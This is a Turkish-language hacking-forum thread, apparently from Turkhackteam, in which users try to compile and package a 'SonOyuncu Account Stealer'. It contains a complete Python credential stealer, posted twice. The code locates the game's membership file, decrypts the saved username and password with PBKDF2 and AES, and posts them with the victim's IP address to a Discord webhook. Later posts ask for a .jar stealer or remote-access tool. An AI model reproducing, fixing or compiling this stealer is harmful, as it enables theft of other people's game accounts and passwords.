- 30 Mar 2022
- 196
- 14
GitHub - itzgonza/SonOyuncu-Account-Stealer: SonOyuncu account stealer/grabber with decryption and webhook sender arkadaşlar bunu nasıl derleyebilirim 2 gündür uğraşıyorum derleyemiyorum bayada araştırdım yardımcı olurmusunuz
import requests
import json
import base64
from Crypto.Cipher import AES
from Crypto.Protocol.KDF import PBKDF2
from Crypto.Util.Padding import unpad
import os
import socket
class AccountStealer:
instance = None
def __init__(self):
self.username = "empty"
self.password = "empty"
self.webhook_url = "WEBHOOK URL GELCEK"
self.membership_path = f"C:/Users/{os.getenv('USERNAME')}/Appdata/Roaming/.sonoyuncu/sonoyuncu-membership.json"
def initialize(self):
self.username = self.get_decrypted_value("sonOyuncuUsername")
self.password = self.get_decrypted_value("sonOyuncuPassword")
ip_address = self.get_ip_address()
if not self.username or not self.password:
self.send_webhook(f"Username or password not found in {self.membership_path}")
else:
payload = {
"username": "eu#1337",
"avatar_url": "https://cdn.discordapp.com/avatars/852809396538048573/da5b04860ebdde2d95d9c7b44c239944.png?size=2048",
"content": "",
"embeds": [
{
"title": "SonOyuncu Account Stealer :dash:",
"color": 65505,
"description": f"a new bait has been spotted :woozy_face:\n\n:small_blue_diamond:Username **{self.username}**\n:small_blue_diamond:Password **{base64.b64decode(self.password).decode()}**",
"timestamp": None,
"author": {"name": "", "url": ""},
"image": {"url": ""},
"thumbnail": {"url": f"https://www.minotar.net/avatar/{self.username}"},
"footer": {"text": "github.com/itzgonza", "icon_url": "https://avatars.githubusercontent.com/u/61884903?v=4"},
"fields": [
{"name": "IP Address", "value": ip_address, "inline": True}
]
}
]
}
headers = {
"Content-Type": "application/json",
"User-Agent": "itzgonza1337.cu"
}
try:
response = requests.post(self.webhook_url, headers=headers, json=payload)
response.raise_for_status()
print("Webhook request successful")
except requests.exceptions.RequestException as e:
print(f"Error sending webhook request: {e}")
def get_decrypted_value(self, key):
try:
with open(self.membership_path, "rb") as file:
file_content = file.read()
# Assuming salt is 8 bytes starting from the beginning
salt = file_content[:8]
# Assuming encrypted data starts right after the salt
encrypted_data = file_content[8:]
key_spec = PBKDF2(os.getenv("COMPUTERNAME"), salt, dkLen=16, count=65536)
cipher = AES.new(key_spec, AES.MODE_CBC, salt)
decrypted_data = unpad(cipher.decrypt(encrypted_data), AES.block_size)
return json.loads(decrypted_data.decode())[key]
except Exception as e:
print(f"Error decrypting value: {e}")
return ""
def get_ip_address(self):
try:
hostname = socket.gethostname()
ip_address = socket.gethostbyname(hostname)
return ip_address
except Exception as e:
print(f"Error getting IP address: {e}")
return "Unknown"
def send_webhook(self, message):
payload = {
"username": "eu#1337",
"content": message
}
headers = {
"Content-Type": "application/json",
"User-Agent": "itzgonza1337.cu"
}
try:
response = requests.post(self.webhook_url, headers=headers, json=payload)
response.raise_for_status()
print("Webhook request successful")
except requests.exceptions.RequestException as e:
print(f"Error sending webhook request: {e}")
# Test the AccountStealer class
if __name__ == "__main__":
AccountStealer.instance = AccountStealer()
AccountStealer.instance.initialize()
.jar olarak çıkmasını istiyorum ben hemde cokkkks veya başka stealerde olur bildigin varmı .jar olarak çıkanbu bendede hata verdi senin için denedim ama ben bunun python versiyonuna çevirdim
Python:import requests import json import base64 from Crypto.Cipher import AES from Crypto.Protocol.KDF import PBKDF2 from Crypto.Util.Padding import unpad import os import socket class AccountStealer: instance = None def __init__(self): self.username = "empty" self.password = "empty" self.webhook_url = "WEBHOOK URL GELCEK" self.membership_path = f"C:/Users/{os.getenv('USERNAME')}/Appdata/Roaming/.sonoyuncu/sonoyuncu-membership.json" def initialize(self): self.username = self.get_decrypted_value("sonOyuncuUsername") self.password = self.get_decrypted_value("sonOyuncuPassword") ip_address = self.get_ip_address() if not self.username or not self.password: self.send_webhook(f"Username or password not found in {self.membership_path}") else: payload = { "username": "eu#1337", "avatar_url": "https://cdn.discordapp.com/avatars/852809396538048573/da5b04860ebdde2d95d9c7b44c239944.png?size=2048", "content": "", "embeds": [ { "title": "SonOyuncu Account Stealer :dash:", "color": 65505, "description": f"a new bait has been spotted :woozy_face:\n\n:small_blue_diamond:Username **{self.username}**\n:small_blue_diamond:Password **{base64.b64decode(self.password).decode()}**", "timestamp": None, "author": {"name": "", "url": ""}, "image": {"url": ""}, "thumbnail": {"url": f"https://www.minotar.net/avatar/{self.username}"}, "footer": {"text": "github.com/itzgonza", "icon_url": "https://avatars.githubusercontent.com/u/61884903?v=4"}, "fields": [ {"name": "IP Address", "value": ip_address, "inline": True} ] } ] } headers = { "Content-Type": "application/json", "User-Agent": "itzgonza1337.cu" } try: response = requests.post(self.webhook_url, headers=headers, json=payload) response.raise_for_status() print("Webhook request successful") except requests.exceptions.RequestException as e: print(f"Error sending webhook request: {e}") def get_decrypted_value(self, key): try: with open(self.membership_path, "rb") as file: file_content = file.read() # Assuming salt is 8 bytes starting from the beginning salt = file_content[:8] # Assuming encrypted data starts right after the salt encrypted_data = file_content[8:] key_spec = PBKDF2(os.getenv("COMPUTERNAME"), salt, dkLen=16, count=65536) cipher = AES.new(key_spec, AES.MODE_CBC, salt) decrypted_data = unpad(cipher.decrypt(encrypted_data), AES.block_size) return json.loads(decrypted_data.decode())[key] except Exception as e: print(f"Error decrypting value: {e}") return "" def get_ip_address(self): try: hostname = socket.gethostname() ip_address = socket.gethostbyname(hostname) return ip_address except Exception as e: print(f"Error getting IP address: {e}") return "Unknown" def send_webhook(self, message): payload = { "username": "eu#1337", "content": message } headers = { "Content-Type": "application/json", "User-Agent": "itzgonza1337.cu" } try: response = requests.post(self.webhook_url, headers=headers, json=payload) response.raise_for_status() print("Webhook request successful") except requests.exceptions.RequestException as e: print(f"Error sending webhook request: {e}") # Test the AccountStealer class if __name__ == "__main__": AccountStealer.instance = AccountStealer() AccountStealer.instance.initialize()
.jar r4t var genelde.jar olarak çıkmasını istiyorum ben hemde cokkkks veya başka stealerde olur bildigin varmı .jar olarak çıkan
Nası Yani He bide senin attığın kodu exeye çevirmem gerekmiyormu çevirdimde çalışmadı bendemı hata var.jar r4t var genelde
aynısını bende deneyip oldukça uğraştım bunun kurulmamasının sebebi kütüphanelerGitHub - itzgonza/SonOyuncu-Account-Stealer: SonOyuncu account stealer/grabber with decryption and webhook sender arkadaşlar bunu nasıl derleyebilirim 2 gündür uğraşıyorum derleyemiyorum bayada araştırdım yardımcı olurmusunuz
chat gpt den yardım almıştım bana commons-codec-1.15.jar gson-2.8.6.jar indirtmişti ve olması gereken yere attırmıştı fakat ben beceremedim javadan anlamıyorum. yapabilen varsa çok iyi oluraynısını bende deneyip oldukça uğraştım bunun kurulmamasının sebebi kütüphaneler
org apache commands
commons codec
com google gson
bunları biliyorum ama yinede yapamadımyapabilen varsa atarsa sevinirim
Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.